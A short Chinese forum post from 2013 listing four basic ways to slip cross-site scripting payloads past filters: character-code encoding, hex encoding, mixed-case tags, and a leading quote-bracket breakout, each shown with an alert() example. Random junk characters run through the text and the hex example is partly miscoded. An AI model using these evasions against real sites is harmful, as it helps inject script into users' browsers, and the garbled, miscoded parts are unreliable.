四种超级基础的绕过方法。
% L# r$ ?4 g7 a1.转换为ASCII码
+ ]* X# F9 x7 Y, u# f9 q例子:原脚本为<script>alert(‘I love F4ck’)</script >" t+ [+ C* d" @
通过转换,变成:
2 L: S% h- q3 ^: H" u5 i<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>4 r9 S$ u% \- }- e
4 H* M. V- I" A. b* ^8 H* H7 j2.转换为HEX(十六进制)1 ~& [$ j3 U7 Q* H
例子:原脚本为<script>alert(‘I love F4ck’)</script>0 \; s) ~$ g; o# J% C
通过转换,变成:
, w. O' @ x8 V5 I' W! E# {- K%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e2 Z6 s! t8 E7 J b q! m
5 C U7 A, @8 }* I5 G3 D* ^
3.转换脚本的大小写
7 Q* U6 Z! s4 a0 o0 `0 H5 b例子:原脚本为<script>alert(‘I love F4ck’)</script>4 h! M5 v1 \! Y
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>& b, J- V5 J0 O, a5 y2 a" J% K4 c
9 {& ?$ l* t L8 I" L5 v
4.增加闭合标记”>
; f& ], ?6 ^! u5 H) I* w例子:原脚本为<script>alert(‘I love F4ck’)</script>
$ E9 R, D8 d$ O7 m: j* P1 J转换为:”><script>alert(‘I love F4ck’)</script>, G9 E0 f& C$ q8 D K
更详细绕过技术请参考此网页
: H) Z$ |% Z6 s! V# t$ D0 Chttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet6 a0 @( C# C- C8 E
5 @) Z% h6 q* t; X
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对